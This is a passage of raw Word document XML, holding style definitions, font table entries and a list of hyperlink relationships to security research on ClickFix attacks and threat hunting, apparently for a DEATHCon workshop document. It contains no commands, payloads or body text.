  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A2">
    <w:pP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000000"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>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4"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US"/>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rFonts w:ascii="DM Mono Medium" w:cs="DM Mono Medium" w:eastAsia="DM Mono Medium" w:hAnsi="DM Mono Medium"/>
      <w:color w:val="d8182f"/>
      <w:sz w:val="50"/>
      <w:szCs w:val="50"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="DM Mono" w:cs="DM Mono" w:eastAsia="DM Mono" w:hAnsi="DM Mono"/>
      <w:color w:val="d8182f"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="DM Mono" w:cs="DM Mono" w:eastAsia="DM Mono" w:hAnsi="DM Mono"/>
      <w:color w:val="d8182f"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="DM Mono" w:cs="DM Mono" w:eastAsia="DM Mono" w:hAnsi="DM Mono"/>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pPr>
    <w:rPr>
      <w:rFonts w:ascii="DM Mono Medium" w:cs="DM Mono Medium" w:eastAsia="DM Mono Medium" w:hAnsi="DM Mono Medium"/>
      <w:color w:val="d8182f"/>
      <w:sz w:val="50"/>
      <w:szCs w:val="50"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="0" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="DM Mono" w:cs="DM Mono" w:eastAsia="DM Mono" w:hAnsi="DM Mono"/>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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpg"/><Relationship Id="rIdLink101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/corporate-responsibility/cybersecurity/microsoft-digital-defense-report-2025/" TargetMode="External"/><Relationship Id="rIdLink102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/en/eset-research/eset-threat-report-h1-2025/" TargetMode="External"/><Relationship Id="rIdLink103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pushsecurity.com/blog/the-state-of-clickfix-by-detection-data" TargetMode="External"/><Relationship Id="rIdLink104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secnews.gr/en/735682/clickfix-istoselides-pagides-malware/" TargetMode="External"/><Relationship Id="rIdLink105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mrd0x.com/filefix-clickfix-alternative/" TargetMode="External"/><Relationship Id="rIdLink106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204/004/" TargetMode="External"/><Relationship Id="rIdLink107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.splunk.com/en_us/blog/security/peak-threat-hunting-framework.html" TargetMode="External"/><Relationship Id="rIdLink108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html" TargetMode="External"/><Relationship Id="rIdLink109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dni.gov/files/documents/ICD/ICD-203.pdf" TargetMode="External"/><Relationship Id="rIdLink110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/defender-xdr/advanced-hunting-deviceregistryevents-table" TargetMode="External"/><Relationship Id="rIdLink111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows" TargetMode="External"/><Relationship Id="rIdLogo1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/deathcon-logo.png"/></Relationships>
</file>

<file path=word/_rels/fontTable.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/DMSans-regular.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-boldItalic.ttf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/DMSans-italic.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/DMSans-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RobotoMono-italic.ttf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/DMMono-regular.ttf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/DMSans-boldItalic.ttf"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/DMMono-italic.ttf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/DMMonoMedium-regular.ttf"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/DMMonoMedium-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